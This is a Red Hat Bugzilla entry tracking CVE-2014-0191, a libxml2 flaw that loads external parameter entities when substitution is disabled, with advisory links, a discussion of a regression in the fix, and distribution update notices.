Bug 1090976 - (CVE-2014-0191) CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled
CVE-2014-0191 libxml2: external parameter entity loaded when entity substitut...
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
impact=moderate,public=20140506,repor...
: Security
Depends On: 1093090 1093091 1107556 1107557 1191425 1195649 1195650
Blocks: 1086699 1090982
  Show dependency treegraph
 
Reported: 2014-04-24 09:59 EDT by Stefan Cornelius
Modified: 2015-11-25 05:04 EST (History)
20 users (show)

See Also:
Fixed In Version: libxml2 2.9.2
Doc Type: Bug Fix
Doc Text:
It was discovered that libxml2 loaded external parameter entities even when entity substitution was disabled. A remote attacker able to provide a specially crafted XML file to an application linked against libxml2 could use this flaw to conduct XML External Entity (XXE) attacks, possibly resulting in a denial of service or an information leak on the system.
Story Points: ---
Clone Of:
Environment:
Last Closed: 2015-03-30 07:56:10 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Stefan Cornelius 2014-04-24 09:59:12 EDT
It was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substituton in the doctype prolog, even if the application using libxml2 disabled any entity substitution. A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.
Comment 1 Stefan Cornelius 2014-04-24 10:09:41 EDT
Acknowledgements:

This issue was discovered by Daniel P. Berrange of Red Hat.
Comment 13 Stefan Cornelius 2014-05-06 11:56:38 EDT
Public via:
http://www.openwall.com/lists/oss-security/2014/05/06/4
Comment 14 Tomas Hoger 2014-05-06 15:01:23 EDT
This issue is related to the handling of external parameter entities.  Even when libxml2 was instructed to parse XML document without preforming entity substitutions (i.e. when parser was run without the XML_PARSE_NOENT option, which is the default), libxml2 loaded external entities, which could lead to some XML eXternal Entities (XXE) attacks.

Similar problem was previously corrected in libxml2 for general entities via:
https://git.gnome.org/browse/libxml2/commit/?id=4629ee02ac649c27f9c0cf98ba017c6b5526070f
Comment 21 errata-xmlrpc 2014-05-19 07:13:33 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 6

Via RHSA-2014:0513 https://rhn.redhat.com/errata/RHSA-2014-0513.html
Comment 22 Vincent Danen 2014-06-09 13:22:20 EDT
Ubuntu just released http://www.ubuntu.com/usn/usn-2214-2/ to note a regression in the upstream fix for this issue, described as:

"""
USN-2214-1 fixed vulnerabilities in libxml2. The upstream fix introduced a
regression when using xmllint with the --postvalid option. This update
fixes the problem.
"""

Given that we have fixed in RHEL6, do we suffer from the same regression?  See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a patch attached (presumably what was used in Ubuntu); also see the upstream report here:

https://bugzilla.gnome.org/show_bug.cgi?id=730290
Comment 23 Michael Chapman 2014-06-09 20:05:32 EDT
Vincent
Comment 24 Michael Chapman 2014-06-09 20:06:07 EDT
Vincent, I think we do have the same regression. See https://bugzilla.redhat.com/show_bug.cgi?id=1104864 .
Comment 25 Stefan Cornelius 2014-06-10 04:00:40 EDT
Created libxml2 tracking bugs for this issue:

Affects: fedora-all [bug 1107556]
Comment 26 Stefan Cornelius 2014-06-10 04:00:44 EDT
Created mingw-libxml2 tracking bugs for this issue:

Affects: fedora-all [bug 1107557]
Comment 27 Stefan Cornelius 2014-06-10 04:09:21 EDT
(In reply to Vincent Danen from comment #22)
> Given that we have fixed in RHEL6, do we suffer from the same regression? 
> See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and
> https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a
> patch attached (presumably what was used in Ubuntu); also see the upstream
> report here:
> 
> https://bugzilla.gnome.org/show_bug.cgi?id=730290

This is a bug we've introduced with this security patch, but from what I can tell it's not a new security issue. As Michael Chapman pointed out in comment 24, this is already being handled in bug 1104864.
Comment 28 Vincent Danen 2014-06-17 12:02:34 EDT
Statement:

Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/errata/.
Comment 29 Tomas Hoger 2015-02-11 05:23:16 EST
Created mingw32-libxml2 tracking bugs for this issue:

Affects: epel-7 [bug 1191425]
Comment 30 Tomas Hoger 2015-02-11 05:25:40 EST
Bug 915149 comment 8 has notes on related issue that affected general external entities.
Comment 32 errata-xmlrpc 2015-03-30 02:18:06 EDT
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2015:0749 https://rhn.redhat.com/errata/RHSA-2015-0749.html
Comment 34 Fedora Update System 2015-04-07 03:30:12 EDT
libxml2-2.9.1-7.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 35 Fedora Update System 2015-04-11 05:07:31 EDT
libxml2-2.9.1-4.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.